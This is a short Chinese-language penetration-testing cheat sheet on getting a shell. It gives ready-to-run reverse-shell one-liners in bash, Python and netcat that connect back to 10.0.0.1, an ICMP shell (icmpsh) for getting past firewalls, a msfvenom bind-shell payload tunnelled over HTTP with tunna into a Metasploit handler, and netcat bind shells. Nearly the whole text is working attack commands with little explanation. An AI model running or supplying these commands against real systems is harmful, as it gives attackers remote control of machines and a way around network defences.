获取shell

常规shell反弹 几个常用:
  1. 1bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  2. 2python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  3. 3rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

各种语言一句话反弹shell: http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%8F%8D%E5%BC%B9shell

突破防火墙的imcp_shell反弹

有时候防火墙可能对tcp进行来处理,然而对imcp并没有做限制的时候,就可以来一波~ kali运行(其中的ip地址填写为目标地址win03): 获取shell - 图1

win03运行:

  1. icmpsh.exe -t kali_ip -d 500 -b 30 -s 128

可以看到icmp进行通信的 获取shell - 图2

Shell反弹不出的时候

主要针对:本机kali不是外网或者目标在dmz里面反弹不出shell,可以通过这种直连shell然后再通过http的端口转发到本地的metasploit

  1. 1msfvenom -p windows/x64/shell/bind_tcp LPORT=12345 -f exe -o ./shell.exe
  2. 先生成一个bind_shell
  3. 2、本地利用tunna工具进行端口转发
  4. python proxy.py -u http://lemon.com/conn.jsp -l 1111 -r 12345 v
  5. 3
  6. use exploit/multi/handler
  7. set payload windows/x64/shell/bind_tcp
  8. set LPORT 1111
  9. set RHOST 127.0.0.1

获取shell - 图3

参考的文章: https://www.91ri.org/11722.html

正向shell
  1. 1nc -e /bin/sh -lp 1234
  2. 2nc.exe -e cmd.exe -lp 1234